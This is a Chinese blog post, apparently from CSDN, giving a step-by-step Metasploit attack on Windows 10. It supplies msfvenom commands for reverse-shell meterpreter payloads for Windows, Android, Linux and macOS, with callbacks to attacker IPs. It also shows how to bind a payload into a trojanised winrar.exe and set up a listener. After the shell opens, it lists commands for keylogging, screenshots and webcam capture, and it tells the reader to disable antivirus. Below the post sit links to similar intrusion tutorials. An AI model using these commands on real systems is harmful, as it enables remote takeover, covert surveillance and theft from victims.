一次攻击(mateploit攻击windows 10总结)

最新推荐文章于 2024-05-21 08:54:04 发布
最新推荐文章于 2024-05-21 08:54:04 发布
阅读量5k 收藏 27
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38204481/article/details/83421202
版权

攻击机:kali2018.3(需要一个metaploit)
受攻击者:windows10(需要关掉杀软,windows自带的也要关掉)

0x01生成

windows

$msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \
msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | \
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe

或者

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=45.32.94.102 LPORT=8888 -f exe > a.exe

android payload

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 R > androvirus.apk

linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

参考http://www.zerokeeper.com/tools/use-of-msfvenom.html
<Your IP Address>这里填的是攻击者的ip <Your Port to Connect On>这里填攻击者的端口

捆绑

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.156 LPORT=8888 -f exe -x winrar.exe -o payload_backdoor.exe

0x02使用

攻击者:监听
受害者:运行之前生成的程序

启动:root@kali:~/桌面# msfconsole
监听:

msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.43.156
lhost => 192.168.43.156
msf exploit(multi/handler) > set lport 8888
lport => 8888
msf exploit(multi/handler) > run

192.168.43.156是攻击者的ip
8888是攻击者的端口
参考https://resources.infosecinstitute.com/how-to-attack-windows-10-machine-with-metasploit-on-kali-linux/#gref
这个时候双击可执行程序
在这里插入图片描述

对方上线啦^_^
遇到的错误
在这里插入图片描述
建立连接之后死了。
用上面的方法监听,关掉杀软之后windows这个问题就解决了。

在这里插入图片描述
可以设置后门
连接后门跟之前一样。

0x03连接之后的使用

reboot-重新启动受害人的计算机
keyscan_dump -键盘记录软件的内容转储
keyscan_start -启动时与如 Word 或浏览器的进程相关联的键盘记录软件
keyscan_stop -停止键盘记录软件
screenshot-抓取 meterpreter 桌面的屏幕截图
webcam_snap-拍照

参考
http://www.91ri.org/8476.html

0x04免杀
先占位,以后再补上吧_

九层台
关注
  • 0
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
使用Metasploit入侵windows之自动扫描
08-07
Metasploit入侵windows之自动扫描方法
2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机
White_give_boy的博客
05-07 1390
使用metasploit(MSF) 和 木马 入侵win10 0x01 实验环境 攻击机:kali linux ip:192.168.171.128 目标机:windows 10 家庭普通版 ip:物理主机 0x02配置msf 1.开启数据库服务 service postgresql start 2.初始化数据库 msfdb init 3.进入msf 4. 加载模块,显示参数 5. 修改参数 LHOST为攻击机ip,LPORT为监听端口 6.开始监...
掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10系统访问权限
最新发布
weixin_43822401的博客
05-21 1112
靶机:IP地址为,运行Windows 10 1903版本。攻击机:IP地址为。文档提供了利用永恒之黑漏洞对Windows 10进行渗透的详细步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。请注意,这些步骤仅供教育目的,实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。
Kali Linux-Metasploit入侵Windows10系统
热门推荐
冷色调的夏天的博客
08-01 3万+
Kali Linux-Metasploit入侵Windows10 写在前文 距离上一次写KALI黑客攻防的博文已是去年这个时候了 之所以再次动手写这类的文章一是因为兴趣,二是看到网上五花八门的文章都是复制粘贴过来的,而且并没有写的很清楚,因此就有了本篇博客的出现 免责声明 切勿根据本文做违法之事,如做违法之事皆于博主本人无关! 实验环境 以下环境可以是两台真实物理机,也可以是一台物理机安装虚拟机 上述两种情况我均已尝试成功,由于在一台电脑上写博文较为方便 因此之后的截图是在一台物理机上的。 KALI:(攻
Mybatis接口Mapper内的方法为啥不能重载吗?
程序员麦冬的博客(公众号同名)
09-14 270
动态代理的功能:通过拦截器方法回调,对目标target方法进行增强。 言外之意就是为了增强目标target方法。上面这句话没错,但也不要认为它就是真理,殊不知,动态代理还有投鞭断流的霸权,连目标target都不要的科幻模式。 注:本文默认认为,读者对动态代理的原理是理解的,如果不明白target的含义,难以看懂本篇文章,建议先理解动态代理。 1. 自定义JDK动态代理之投鞭断流实现自动映射器Mapper 首先定义一个pojo。 public class User { private Integer id
metasploit(永恒之蓝 2017 第10号漏洞)攻击windows操作系统
weixin_73592765的博客
08-02 215
( payload是攻击载荷,就是攻击后的行动,这里是想获取meterpreter)(meterpreter是metaspoit后渗透神器)set LPORT 12345(LPORT为listen port,代表在kaili上即将开启的端口,1-65535随便选,但不能被占用)set LHOST 192.168.1.136(LHOSTS是listen host,是kali的IP地址)使用sudo su命令,并输入kali的密码kali,切换至root用户。使用模块->配置模块必选项 ->运行模块。
【kail】使用Metasploit 渗透Windows10
爪白白的个人博客
12-14 6911
一、在Kali Linux中生成被控端(msfvenom命令) 第一步:下面我们用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.43.77”,连接的端口为“5000”,生成的文件为payload.exe,在/root目录下 msfvenom -p windows/meterpreter/re...
网络渗透系列(三)Kali渗透工具- metasploit利用永恒之蓝漏洞攻击Windows系统全流程(全程干货、火爆连载更新中...)
Midheart1的博客
12-29 804
永恒之蓝漏洞Windows10及之前的系统都存在永恒之蓝漏洞,有很多业界大佬纷纷提出过这个事情,所以永恒之蓝这个经典案例依然值得学习和深入开发。
入侵win10(下)--渗透系统
systemino的博客
05-25 4080
攻击者在远程私有服务器上配置完metasploit,创建了自动化资源脚本和生成了简单地payload之后,只要能够物理接触他人的电脑几分钟,他就可以远程控制别人的电脑了,即使电脑已关机也无济于事。 如果你还不太明白,请务必参考我的上一篇文章:设置live USB和payload USB。不然,你可能会有些蒙圈,不知道我下面会说到的两个USB从何而来。 完成上一篇文章中的一系列操作之后,这篇文章...
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2353
windows payload 反弹shell
Metapsloit后渗透Windows攻击(亲测metepreter使用教程)
wanqianshao的博客
04-02 6047
Meterpreter是什么? 在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。 如何进入meterpreter? 实验环境: kali metasploit 192.168.31.135 windows7 192.168.31.160 实验步骤: msfvenom -
DOS/DDOS攻击方案
qq_72583325的博客
08-09 584
本文档编写的目的在于介绍四种DDOS/DOS攻击手段。
vmware条件下使用kali linux虚拟机对windows10进行渗透攻击的记录(学习使用)
wcf2020的博客
11-14 8389
使用kali linux虚拟机对windows10进行渗透攻击的记录 一、安装vmware tools以保证在虚拟机上创建的文件与主机可相互移动: VMware Tools是VMware虚拟机中自带的一种增强工具,是VMware提供的增强虚拟显卡和硬盘性能、以及同步虚拟机与主机时钟的驱动程序。只有在VMware虚拟机中安装好了VMware Tools,才能实现主机与虚拟机之间的文件共享,同时可支持自由拖拽的功能,鼠标也可在虚拟机与主机之间自由移动(不用再按ctrl+alt),且虚拟机屏幕也可实现...
Kali MSF攻击Win10
nlj1860453的博客
01-05 1185
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
Metasploit 原理 使用
煮酒闲谈
08-13 3645
About Metasploit____________________________________________________________________________________________________________________________________________-Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问
利用微软编号为ms12-020的漏洞,实施dos攻击,造成目标停止服务
qq_40624810的博客
08-17 768
微软的Windows操作系统提供了远程桌面协议,这是一个多通道的协议,用户可以利用这个协议连上提供微软终端机服务的计算机。但是微软提供的这个服务被发现存在一个编号为ms12-020的漏洞,Windows在处理某些RDP报文Terminal Server存在错误,可被利用造成服务停止响应。默认情况下,任何windows操作系统都未启用远程桌面协议(RDP)。没有启用RDP的系统不受威胁。 ...
Python脚本与Metasploit交互攻击
谢公子的博客
11-08 5528
Metasploit是一款强大的漏洞扫描和利用工具,编写Python脚本与Metasploit进行交互,可以自动化的扫描和利用漏洞。 相关文章:Metasploit框架的使用 在脚本中,我们首选需要利用 nmap 模块扫描目标主机是否开放了445端口,我们写了一个 findTarget() 函数,来扫描给定ip或者给定网段中开放了目标端口的主机,返回开放了445端口的主机列表。445端口是作为...
Metasploit入门详解
NoobMaster的博客
02-23 605
–作者:CV 本文主要讲metasploit的入门用法,还有一些渗透细节和思路,有不足的,欢迎互相学习研究。本人区别于书籍的特点是:书籍以模块为划分,我是以连续的步骤进行书写,更突出一次渗透的思路,同时我会通过强调步骤的细节技巧,用以拓展相关类容。 由于我现在对metasploit的深入度并不足,只能使用metasploit做一些初级入门的系统测试,一下是常规步骤和方法: 1、 使用nmap...
Windows 内核攻击
weixin_34343000的博客
03-08 402
netwind · 2015/05/20 13:510x00 引言作者:Ashfaq Ansari本文总结了目前windows内核攻击的各种攻击技术.描述并演示了一些常见的绕过windows内核防护的方法,并举一反三地介绍了如何通过内核缺陷找到类似的绕过方法。 通过对内核攻击和内存结构的理解将会进一步丰富基于用户模式应用程序的缓冲溢出知识。通过大量内核漏洞的研究表明,特定的内核代码执行可能大多由用...
初探Metasploit的自动攻击
要不,单步调试走起?
01-08 1万+
本文总结下研究强大渗透平台:Metasploit结合强大的扫描器:Nessus,nmap后的自动攻击手法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值